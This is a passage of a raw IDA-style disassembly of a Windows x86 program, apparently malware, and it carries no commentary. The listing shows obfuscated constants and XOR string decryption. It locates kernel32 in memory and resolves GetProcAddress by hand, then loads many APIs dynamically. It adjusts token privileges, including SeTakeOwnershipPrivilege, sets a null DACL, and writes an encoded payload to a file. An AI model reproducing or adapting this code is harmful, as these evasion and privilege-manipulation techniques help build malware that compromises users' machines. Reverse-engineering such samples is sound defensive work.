sub_441F34 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_441F97 proc near ; DATA XREF: sub_43E524+BB�o
; sub_43E524+C6�o
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 118h
push ebx
push esi
push edi
mov eax, dword_44D198
movsx edx, word_44D120
add eax, edx
sub eax, 12h
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_441FD0
push offset dword_4490A0
lea eax, [ebp+var_110]
push eax
call sub_445970
jmp short loc_441FE1
; ---------------------------------------------------------------------------
loc_441FD0: ; CODE XREF: sub_441F97+24�j
push offset dword_44A430
lea eax, [ebp+var_110]
push eax
call sub_445970
loc_441FE1: ; CODE XREF: sub_441F97+37�j
push 0
mov eax, dword_44D134
sub eax, 4
push eax
push 4
push 0
movsx eax, word_44D130
movsx edx, word_44D098
add eax, edx
sub eax, 7
push eax
push 40000000h
lea eax, [ebp+var_110]
push eax
call ds:dword_44C968 ; CreateFileA
mov [ebp+var_8], eax
push 2
push 0
mov eax, dword_44D174
sub eax, 2
push eax
push [ebp+var_8]
call ds:dword_44CD80 ; SetFilePointer
push offset byte_44DD89
call sub_43AC82
pop ecx
push 0
lea edx, [ebp+var_C]
push edx
mov edx, dword_44D22C
add edx, dword_44D0EC
sub edx, 6
push edx
push eax
push [ebp+var_8]
call ds:dword_44CD6C ; WriteFile
push 493E0h
push 40h
call ds:dword_4499EC ; LocalAlloc
mov ebx, eax
push 61A80h
push 40h
call ds:dword_4499EC ; LocalAlloc
mov esi, eax
mov eax, dword_44D244
movsx edx, word_44D120
add eax, edx
sub eax, 12h
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_44209F
mov eax, [ebp+arg_0]
inc eax
push eax
push ebx
call sub_445970
jmp short loc_4420A8
; ---------------------------------------------------------------------------
loc_44209F: ; CODE XREF: sub_441F97+F9�j
push [ebp+arg_0]
push ebx
call sub_445970
loc_4420A8: ; CODE XREF: sub_441F97+106�j
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_4420AD: ; CODE XREF: sub_441F97+11B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4420AD
mov [ebp+var_4], eax
mov eax, dword_44D1E8
mov edi, eax
add edi, dword_44D09C
sub edi, 8
jmp short loc_4420EF
; ---------------------------------------------------------------------------
loc_4420C9: ; CODE XREF: sub_441F97+15B�j
movzx eax, byte ptr [ebx+edi]
mov [ebp+var_114], eax
mov eax, edi
mul edi
mov [ebp+var_118], eax
mov eax, [ebp+var_114]
mov edx, [ebp+var_118]
add eax, edx
mov [ebx+edi], al
inc edi
loc_4420EF: ; CODE XREF: sub_441F97+130�j
cmp edi, [ebp+var_4]
jb short loc_4420C9
mov eax, dword_44D0CC
add eax, 61A76h
add eax, dword_44D0A8
push eax
push esi
push [ebp+var_4]
push ebx
call sub_4443C4
add esp, 10h
movsx edi, word_44D0B8
sub edi, 9
jmp short loc_442133
; ---------------------------------------------------------------------------
loc_44211E: ; CODE XREF: sub_441F97+1AA�j
cmp byte ptr [esi+edi], 2Bh
jnz short loc_442128
mov byte ptr [esi+edi], 28h
loc_442128: ; CODE XREF: sub_441F97+18B�j
cmp byte ptr [esi+edi], 3Dh
jnz short loc_442132
mov byte ptr [esi+edi], 29h
loc_442132: ; CODE XREF: sub_441F97+195�j
inc edi
loc_442133: ; CODE XREF: sub_441F97+185�j
mov ecx, esi
or eax, 0FFFFFFFFh
loc_442138: ; CODE XREF: sub_441F97+1A6�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_442138
cmp edi, eax
jb short loc_44211E
mov eax, dword_44D1B0
sub eax, 7
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_442181
push offset dword_44DD84
call sub_43AC82
add esp, 4
push 0
lea edi, [ebp+var_C]
push edi
mov edi, dword_44D22C
add edi, dword_44D1E4
sub edi, 4
push edi
push eax
push [ebp+var_8]
call ds:dword_44CD6C ; WriteFile
loc_442181: ; CODE XREF: sub_441F97+1BB�j
mov ecx, esi
or eax, 0FFFFFFFFh
loc_442186: ; CODE XREF: sub_441F97+1F4�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_442186
push 0
lea edx, [ebp+var_C]
push edx
mov edx, dword_44D140
add edx, dword_44D158
sub edx, 10h
mov edi, eax
add edi, edx
push edi
push esi
push [ebp+var_8]
call ds:dword_44CD6C ; WriteFile
push [ebp+var_8]
call ds:dword_44B82C ; CloseHandle
push ebx
call ds:dword_4495CC ; LocalFree
push esi
call ds:dword_4495CC ; LocalFree
pop edi
pop esi
pop ebx
leave
retn
sub_441F97 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4421CD proc near ; DATA XREF: .data:0044D348�o
push ebp
mov ebp, esp
mov eax, dword_44D1E8
add eax, dword_44D1C8
sub eax, 9
cmp ds:dword_44CD8C, eax
jbe short loc_4421F1
push offset dword_44CD8C
call ds:dword_446010 ; InterlockedDecrement
loc_4421F1: ; CODE XREF: sub_4421CD+17�j
mov eax, ds:dword_44CD8C
pop ebp
retn 4
sub_4421CD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4421FA proc near ; CODE XREF: sub_44475F+227�p
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_281 = byte ptr -281h
var_26C = byte ptr -26Ch
var_252 = byte ptr -252h
var_23D = byte ptr -23Dh
var_231 = byte ptr -231h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_21F = byte ptr -21Fh
var_21C = byte ptr -21Ch
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_103 = byte ptr -103h
var_102 = byte ptr -102h
var_101 = byte ptr -101h
var_FE = byte ptr -0FEh
var_FD = byte ptr -0FDh
var_FC = byte ptr -0FCh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, dword_44D0E0
add esi, 6
mov ecx, esi
add ecx, dword_44D13C
shr edi, cl
movsx esi, word_44D144
movsx edx, word_44D128
lea esi, [esi+edx+2]
mov ecx, esi
mov ebx, edi
shl ebx, cl
loc_442234: ; CODE XREF: sub_4421FA+55�j
; sub_4421FA+98�j ...
mov [ebp+var_114], ebx
mov eax, ebx
cmp word ptr [eax], 5A4Dh
jz short loc_442251
mov eax, dword_44D134
add eax, 0FFFCh
sub ebx, eax
jmp short loc_442234
; ---------------------------------------------------------------------------
loc_442251: ; CODE XREF: sub_4421FA+47�j
mov eax, dword_44D184
add eax, 38h
add eax, dword_44D1D8
mov edx, ebx
add edx, eax
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_118], edx
mov eax, [ebp+arg_0]
cmp edx, eax
jbe short loc_442294
movsx eax, word_44D11C
mov edx, dword_44D234
lea eax, [eax+edx+0FFF9h]
sub ebx, eax
jmp short loc_442234
; ---------------------------------------------------------------------------
loc_442294: ; CODE XREF: sub_4421FA+80�j
mov eax, [ebp+var_118]
mov [ebp+var_11C], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jz short loc_4422BB
mov eax, dword_44D1A4
add eax, 0FFFFh
sub ebx, eax
jmp loc_442234
; ---------------------------------------------------------------------------
loc_4422BB: ; CODE XREF: sub_4421FA+AE�j
mov eax, [ebp+var_11C]
mov eax, [eax+78h]
mov [ebp+var_120], eax
mov ecx, ebx
add ecx, eax
mov [ebp+var_110], ecx
mov eax, ecx
mov edx, ebx
add edx, [eax+0Ch]
push edx
lea eax, [ebp+var_103]
push eax
call sub_445970
mov eax, dword_44D168
add eax, dword_44D1F8
sub eax, 0Fh
mov [ebp+var_4], eax
jmp short loc_44231D
; ---------------------------------------------------------------------------
loc_4422FB: ; CODE XREF: sub_4421FA+142�j
mov eax, [ebp+var_4]
mov al, [ebp+eax+var_103]
cmp al, 61h
jle short loc_44231A
cmp al, 7Ah
jge short loc_44231A
mov eax, [ebp+var_4]
lea eax, [ebp+eax+var_103]
sub byte ptr [eax], 20h
loc_44231A: ; CODE XREF: sub_4421FA+10D�j
; sub_4421FA+111�j
inc [ebp+var_4]
loc_44231D: ; CODE XREF: sub_4421FA+FF�j
mov eax, [ebp+var_4]
movsx eax, [ebp+eax+var_103]
mov edx, dword_44D188
movsx ecx, word_44D228
add edx, ecx
sub edx, 0Dh
cmp eax, edx
jnz short loc_4422FB
cmp [ebp+var_103], 4Bh
jnz short loc_442374
cmp [ebp+var_102], 45h
jnz short loc_442374
cmp [ebp+var_101], 52h
jnz short loc_442374
cmp [ebp+var_FE], 4Ch
jnz short loc_442374
cmp [ebp+var_FD], 33h
jnz short loc_442374
cmp [ebp+var_FC], 32h
jz short loc_442379
loc_442374: ; CODE XREF: sub_4421FA+14B�j
; sub_4421FA+154�j ...
jmp loc_4425A1
; ---------------------------------------------------------------------------
loc_442379: ; CODE XREF: sub_4421FA+178�j
mov eax, dword_44D0D4
movsx edx, word_44D12C
add eax, edx
sub eax, 8
mov [ebp+var_108], eax
jmp loc_44258C
; ---------------------------------------------------------------------------
loc_442395: ; CODE XREF: sub_4421FA+3A1�j
mov eax, [ebp+var_108]
mov ecx, dword_44D18C
add ecx, 3
mul ecx
mov [ebp+var_228], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+20h]
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_224], edx
push edx
lea eax, [ebp+var_21F]
push eax
call sub_445970
movsx eax, word_44D194
mov edx, eax
add edx, dword_44D198
cmp [ebp+edx+var_231], 47h
jnz loc_442586
movsx edx, word_44D164
cmp byte ptr [ebp+edx+var_224+3], 74h
jnz loc_442586
mov edx, dword_44D0D4
cmp [ebp+edx+var_21C], 50h
jnz loc_442586
cmp byte ptr [ebp+eax+var_224+2], 63h
jnz loc_442586
mov eax, dword_44D24C
add eax, dword_44D1A4
cmp byte ptr [ebp+eax+var_224+2], 41h
jnz loc_442586
mov eax, dword_44D1A8
add eax, dword_44D17C
cmp byte ptr [ebp+eax+var_228+2], 72h
jnz loc_442586
mov eax, [ebp+var_108]
mov ecx, dword_44D134
add ecx, dword_44D1E0
sub ecx, 3
mul ecx
mov [ebp+var_288], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+24h]
mov [ebp+var_114], edx
movzx eax, word ptr [edx]
mov [ebp+var_22C], eax
mov ecx, dword_44D0AC
add ecx, dword_44D0D4
dec ecx
mul ecx
mov [ebp+var_28C], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+1Ch]
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_230], edx
mov dword_44D254, ebx
mov ds:dword_4491AC, edx
lea edi, [ebp+var_23D]
lea esi, aCreatethread ; "CreateThread"
mov ecx, 0Dh
rep movsb
lea edi, [ebp+var_252]
lea esi, aEntercriticals ; "EnterCriticalSection"
mov ecx, 15h
rep movsb
lea edi, [ebp+var_26C]
lea esi, aInitializecrit ; "InitializeCriticalSection"
mov ecx, 0Dh
rep movsw
lea edi, [ebp+var_281]
lea esi, aLeavecriticals ; "LeaveCriticalSection"
mov ecx, 15h
rep movsb
lea eax, [ebp+var_23D]
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44CD70, eax
lea eax, [ebp+var_252]
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C83C, eax
lea eax, [ebp+var_26C]
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_447FB8, eax
lea eax, [ebp+var_281]
push eax
push dword_44D254
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44B824, eax
jmp short loc_4425A1
; ---------------------------------------------------------------------------
loc_442586: ; CODE XREF: sub_4421FA+1F5�j
; sub_4421FA+20A�j ...
inc [ebp+var_108]
loc_44258C: ; CODE XREF: sub_4421FA+196�j
mov eax, [ebp+var_110]
mov eax, [eax+18h]
cmp [ebp+var_108], eax
jb loc_442395
loc_4425A1: ; CODE XREF: sub_4421FA:loc_442374�j
; sub_4421FA+38A�j
pop edi
pop esi
pop ebx
leave
retn
sub_4421FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4425A6 proc near ; CODE XREF: sub_43CEF8+24C�p
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_28 = dword ptr -28h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
mov eax, dword_44D234
add eax, dword_44D0AC
sub eax, 7
push eax
push [ebp+arg_8]
push [ebp+arg_0]
call sub_4435CB
add esp, 0Ch
mov [ebp+var_48], eax
test eax, eax
jnz loc_4427FA
mov [ebp+var_18], 8
push offset dword_44DD74
call sub_442CEF
pop ecx
push eax
call ds:dword_446FF8
mov [ebp+var_10], eax
lea eax, [ebp+var_8]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_8]
push edi
mov edi, [edi]
call dword ptr [edi+30h]
mov ebx, eax
mov eax, dword_44D104
sub eax, 4
cmp ebx, eax
jnz loc_4427DE
lea eax, [ebp+var_3C]
push eax
push offset dword_44EC54
mov eax, [ebp+var_8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44D0AC
add eax, dword_44D0C0
sub eax, 9
cmp ebx, eax
jnz loc_4427D5
mov [ebp+var_30], 2
movsx eax, word_44D23C
add eax, dword_44D0C0
sub eax, 9
mov [ebp+var_28], eax
lea eax, [ebp+var_1C]
push eax
lea esi, [ebp+var_30]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_30]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_3C]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
mov eax, dword_44D15C
add eax, dword_44D094
sub eax, 2
cmp ebx, eax
jnz loc_4427CC
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push offset dword_44EC64
mov eax, [ebp+var_1C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44D244
add eax, dword_44D248
sub eax, 9
cmp ebx, eax
jnz loc_4427C3
inc ds:dword_4495D0
mov eax, dword_44D214
add eax, 5
movsx edx, word_44D0B4
add eax, edx
cmp ds:dword_4495D0, eax
jb short loc_442716
mov eax, dword_44D10C
add eax, 0Ah
mov ds:dword_4495D0, eax
push [ebp+var_4]
call sub_43F19E
pop ecx
jmp loc_4427BA
; ---------------------------------------------------------------------------
loc_442716: ; CODE XREF: sub_4425A6+153�j
movsx eax, word_44D148
mov [ebp+var_4C], eax
lea eax, [ebp+var_44]
push eax
push ds:dword_44B814
call sub_44285A
mov [ebp+var_34], eax
lea eax, [ebp+var_40]
push eax
push ds:dword_446018
call sub_44285A
add esp, 10h
mov [ebp+var_38], eax
cmp [ebp+var_44], 0
jz short loc_442768
cmp [ebp+var_34], 0
jz short loc_442768
lea eax, [ebp+var_4C]
push eax
push [ebp+var_4]
push [ebp+var_44]
push [ebp+var_34]
call sub_442DF5
add esp, 10h
loc_442768: ; CODE XREF: sub_4425A6+1A5�j
; sub_4425A6+1AB�j
cmp [ebp+var_40], 0
jz short loc_442789
cmp [ebp+var_38], 0
jz short loc_442789
lea eax, [ebp+var_4C]
push eax
push [ebp+var_4]
push [ebp+var_40]
push [ebp+var_38]
call sub_442DF5
add esp, 10h
loc_442789: ; CODE XREF: sub_4425A6+1C6�j
; sub_4425A6+1CC�j
push [ebp+var_34]
call ds:dword_4495CC ; LocalFree
push [ebp+var_38]
call ds:dword_4495CC ; LocalFree
movsx eax, word_44D148
add eax, dword_44D0A4
sub eax, 7
push eax
push [ebp+arg_8]
push [ebp+arg_0]
call sub_4435CB
add esp, 0Ch
loc_4427BA: ; CODE XREF: sub_4425A6+16B�j
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4427C3: ; CODE XREF: sub_4425A6+130�j
mov eax, [ebp+var_1C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4427CC: ; CODE XREF: sub_4425A6+FE�j
mov eax, [ebp+var_3C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4427D5: ; CODE XREF: sub_4425A6+A2�j
mov eax, [ebp+var_8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4427DE: ; CODE XREF: sub_4425A6+74�j
lea eax, [ebp+var_18]
push eax
call ds:dword_44CD84
mov eax, dword_44D118
add eax, dword_44D0A8
sub eax, 0Ah
cmp ebx, eax
jz short $+2
loc_4427FA: ; CODE XREF: sub_4425A6+2B�j
pop edi
pop esi
pop ebx
leave
retn
sub_4425A6 endp
; =============== S U B R O U T I N E =======================================
sub_4427FF proc near ; CODE XREF: sub_43A39F+20�p
push edi
push offset byte_44DD67
call sub_43AC82
pop ecx
push eax
call ds:dword_449598 ; GetModuleHandleA
mov dword_44D26C, eax
test eax, eax
jnz short loc_442832
push offset dword_44DD5C
call sub_43AC82
pop ecx
push eax
call ds:dword_44A208 ; LoadLibraryA
mov dword_44D26C, eax
loc_442832: ; CODE XREF: sub_4427FF+1A�j
cmp dword_44D26C, 0
jz short loc_442858
push offset word_44DD46
call sub_43AC82
pop ecx
push eax
push dword_44D26C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_4495B4, eax
loc_442858: ; CODE XREF: sub_4427FF+3A�j
pop edi
retn
sub_4427FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44285A proc near ; CODE XREF: sub_43E36B+18�p
; sub_4425A6+184�p ...
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+arg_0]
call ds:dword_44C968 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_44289D
cmp [ebp+arg_4], 0
jz short loc_442899
mov eax, [ebp+arg_4]
movsx edx, word_44D0E8
sub edx, 4
mov [eax], edx
loc_442899: ; CODE XREF: sub_44285A+2E�j
xor eax, eax
jmp short loc_4428E1
; ---------------------------------------------------------------------------
loc_44289D: ; CODE XREF: sub_44285A+28�j
push 0
push edi
call ds:dword_44C7F8 ; GetFileSize
mov esi, eax
add eax, 10h
push eax
push 40h
call ds:dword_4499EC ; LocalAlloc
mov ebx, eax
push 0
cmp [ebp+arg_4], 0
jz short loc_4428C6
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
jmp short loc_4428CC
; ---------------------------------------------------------------------------
loc_4428C6: ; CODE XREF: sub_44285A+62�j
lea eax, [ebp+var_4]
mov [ebp+var_8], eax
loc_4428CC: ; CODE XREF: sub_44285A+6A�j
push [ebp+var_8]
push esi
push ebx
push edi
call ds:dword_44602C ; ReadFile
push edi
call ds:dword_44B82C ; CloseHandle
mov eax, ebx
loc_4428E1: ; CODE XREF: sub_44285A+41�j
pop edi
pop esi
pop ebx
leave
retn
sub_44285A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4428E6 proc near ; CODE XREF: sub_43A39F+26E�p
var_68 = dword ptr -68h
var_40 = byte ptr -40h
var_3C = dword ptr -3Ch
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 40h
push ebx
push esi
push edi
call sub_43AF59
or eax, eax
jnz short loc_442904
mov edi, dword_44D124
dec edi
jmp loc_442AB4
; ---------------------------------------------------------------------------
loc_442904: ; CODE XREF: sub_4428E6+10�j
call ds:dword_4499F8 ; GetCurrentProcessId
mov ebx, eax
push ebx
movsx eax, word_44D1C0
sub eax, 9
push eax
push 1F0FFFh
call ds:dword_44CD7C ; OpenProcess
mov esi, eax
lea eax, [ebp+var_4]
push eax
push 28h
push esi
call ds:dword_449080 ; OpenProcessToken
mov edi, eax
movsx eax, word_44D0B4
add eax, dword_44D108
sub eax, 0Dh
cmp edi, eax
jz loc_442AB4
mov edx, dword_44D0FC
add edx, dword_44D104
mov ecx, dword_44D198
sub ecx, 9
mov [ebp+edx*4+var_68], ecx
lea eax, [ebp+var_40]
push eax
push 28h
lea eax, [ebp+var_3C]
push eax
mov eax, dword_44D0E0
add eax, 13h
push eax
push [ebp+var_4]
call ds:dword_44C7F0 ; GetTokenInformation
mov edi, eax
cmp [ebp+arg_0], 0
jz short loc_4429CD
mov eax, dword_44D0A4
sub eax, 9
cmp edi, eax
jnz short loc_4429A1
mov edi, dword_44D174
dec edi
jmp loc_442AB4
; ---------------------------------------------------------------------------
loc_4429A1: ; CODE XREF: sub_4428E6+AD�j
mov edi, dword_44D0C8
dec edi
mov eax, dword_44D13C
add eax, dword_44D1F8
sub eax, 0Eh
cmp [ebp+var_3C], eax
jz loc_442AB4
mov edi, dword_44D19C
sub edi, 9
jmp loc_442AB4
; ---------------------------------------------------------------------------
loc_4429CD: ; CODE XREF: sub_4428E6+A1�j
cmp dword_44D284, 0
jnz short loc_4429EE
mov eax, dword_44D0FC
add eax, 3FF9h
push eax
push 40h
call ds:dword_4499EC ; LocalAlloc
mov dword_44D284, eax
loc_4429EE: ; CODE XREF: sub_4428E6+EE�j
lea eax, [ebp+var_40]
push eax
mov eax, dword_44D234
add eax, 3FFDh
push eax
push dword_44D284
push 1
push [ebp+var_4]
call ds:dword_44C7F0 ; GetTokenInformation
cmp dword_44D288, 0
jnz short loc_442A26
push 14h
push 0
call ds:dword_4499EC ; LocalAlloc
mov dword_44D288, eax
loc_442A26: ; CODE XREF: sub_4428E6+12F�j
push 1
push dword_44D288
call ds:dword_446FF4 ; InitializeSecurityDescriptor
mov edi, eax
push 0
push 0
push 1
push dword_44D288
call ds:dword_44A1E0 ; SetSecurityDescriptorDacl
mov edi, eax
push 0
mov eax, dword_44D284
push dword ptr [eax]
push dword_44D288
call ds:dword_4499E8 ; SetSecurityDescriptorOwner
mov edi, eax
lea eax, [ebp+var_10]
push eax
push offset aSetakeownershi ; "SeTakeOwnershipPrivilege"
push 0
call ds:dword_44601C ; LookupPrivilegeValueA
mov edi, eax
mov eax, dword_44D1AC
sub eax, 5
cmp edi, eax
jz short loc_442AB4
mov eax, dword_44D0DC
inc eax
mov [ebp+var_14], eax
mov [ebp+var_8], 2
push 0
push 0
mov eax, dword_44D14C
add eax, dword_44D178
sub eax, 0Dh
push eax
lea eax, [ebp+var_14]
push eax
push 0
push [ebp+var_4]
call ds:dword_44B810 ; AdjustTokenPrivileges
mov edi, eax
loc_442AB4: ; CODE XREF: sub_4428E6+19�j
; sub_4428E6+60�j ...
push [ebp+var_4]
call ds:dword_44B82C ; CloseHandle
push esi
call ds:dword_44B82C ; CloseHandle
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_4428E6 endp
; =============== S U B R O U T I N E =======================================
sub_442ACB proc near ; CODE XREF: sub_43A39F+27A�p
push 2
call sub_43B380
push 0
call sub_43B380
add esp, 8
retn
sub_442ACB endp
; =============== S U B R O U T I N E =======================================
sub_442ADD proc near ; CODE XREF: sub_44475F+26C�p
push edi
push offset byte_44DD1F
call sub_43AC82
pop ecx
push eax
call ds:dword_449598 ; GetModuleHandleA
mov dword_44D258, eax
test eax, eax
jnz short loc_442B10
push offset byte_44DD11
call sub_43AC82
pop ecx
push eax
call ds:dword_44A208 ; LoadLibraryA
mov dword_44D258, eax
loc_442B10: ; CODE XREF: sub_442ADD+1A�j
push offset byte_44DD07
call sub_43AC82
push eax
push dword_44D258
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C80C, eax
push offset dword_44DCFC
call sub_43AC82
push eax
push dword_44D258
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_446034, eax
push offset dword_44DCF4
call sub_43AC82
push eax
push dword_44D258
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_447008, eax
push offset dword_44DCEC
call sub_43AC82
push eax
push dword_44D258
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_4499F0, eax
push offset word_44DCE2
call sub_43AC82
push eax
push dword_44D258
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_4499E0, eax
push offset dword_44DCD8
call sub_43AC82
push eax
push dword_44D258
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C828, eax
push offset word_44DCCE
call sub_43AC82
push eax
push dword_44D258
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44B808, eax
push offset dword_44DCC4
call sub_43AC82
push eax
push dword_44D258
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44B818, eax
push offset dword_44DCBC
call sub_43AC82
push eax
push dword_44D258
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44CD90, eax
push offset byte_44DCB3
call sub_43AC82
push eax
push dword_44D258
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C7D0, eax
push offset byte_44DCA9
call sub_43AC82
push eax
push dword_44D258
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_446024, eax
push offset word_44DC9E
call sub_43AC82
push eax
push dword_44D258
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C810, eax
push offset word_44DC92
call sub_43AC82
push eax
push dword_44D258
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44A210, eax
push offset dword_44DC88
call sub_43AC82
add esp, 38h
push eax
push dword_44D258
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_4491A4, eax
pop edi
retn
sub_442ADD endp
; =============== S U B R O U T I N E =======================================
sub_442C9D proc near ; CODE XREF: sub_43A39F+2A�p
push edi
push offset byte_44DC79
call sub_43AC82
pop ecx
push eax
call ds:dword_449598 ; GetModuleHandleA
mov dword_44D274, eax
test eax, eax
jnz short loc_442CD0
push offset word_44DC6A
call sub_43AC82
pop ecx
push eax
call ds:dword_44A208 ; LoadLibraryA
mov dword_44D274, eax
loc_442CD0: ; CODE XREF: sub_442C9D+1A�j
push offset word_44DC56
call sub_43AC82
pop ecx
push eax
push dword_44D274
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_449A00, eax
pop edi
retn
sub_442C9D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_442CEF proc near ; CODE XREF: sub_43BC02+1C2�p
; sub_441138+1F7�p ...
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp dword_44D250, 0
jnz short loc_442D17
push offset dword_44CDA0
call ds:dword_447FB8 ; InitializeCriticalSection
mov dword_44D250, 1
loc_442D17: ; CODE XREF: sub_442CEF+11�j
mov esi, dword_44D154
add esi, 3
movzx ebx, byte ptr [edi]
movzx edx, byte ptr [edi+2]
movzx edx, dx
shl edx, 8
or ebx, edx
movzx ebx, bx
mov edx, dword_44D214
add edx, dword_44D094
dec edx
imul ebx, edx
add esi, ebx
mov [ebp+var_4], si
movzx eax, [ebp+var_4]
mov edx, dword_44D24C
movsx ecx, word_44D1B8
add edx, ecx
sub edx, 8
cmp eax, edx
jz loc_442DED
push offset dword_44CDA0
call ds:dword_44C83C ; RtlEnterCriticalSection
mov eax, dword_44D20C
dec eax
mov [ebp+var_2], ax
jmp short loc_442DA2
; ---------------------------------------------------------------------------
loc_442D7D: ; CODE XREF: sub_442CEF+BD�j
movzx eax, [ebp+var_2]
add eax, edi
movsx edx, byte ptr [eax]
movsx ecx, byte ptr [edi+4]
xor edx, ecx
mov [eax], dl
movzx eax, [ebp+var_2]
movsx edx, word_44D0C4
sub edx, 7
add eax, edx
mov [ebp+var_2], ax
loc_442DA2: ; CODE XREF: sub_442CEF+8C�j
movzx eax, [ebp+var_2]
movzx edx, [ebp+var_4]
cmp eax, edx
jl short loc_442D7D
mov eax, dword_44D1F8
add eax, dword_44D230
sub eax, 0Dh
mov edx, dword_44D188
sub edx, 9
mov [edi+eax], dl
movsx eax, word_44D0B8
sub eax, 7
mov edx, dword_44D0F0
add edx, dword_44D1E0
dec edx
mov [edi+eax], dl
push offset dword_44CDA0
call ds:dword_44B824 ; RtlLeaveCriticalSection
loc_442DED: ; CODE XREF: sub_442CEF+71�j
lea eax, [edi+6]
pop edi
pop esi
pop ebx
leave
retn
sub_442CEF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_442DF5 proc near ; CODE XREF: sub_4425A6+1BA�p
; sub_4425A6+1DB�p
var_4F = byte ptr -4Fh
var_1D = byte ptr -1Dh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
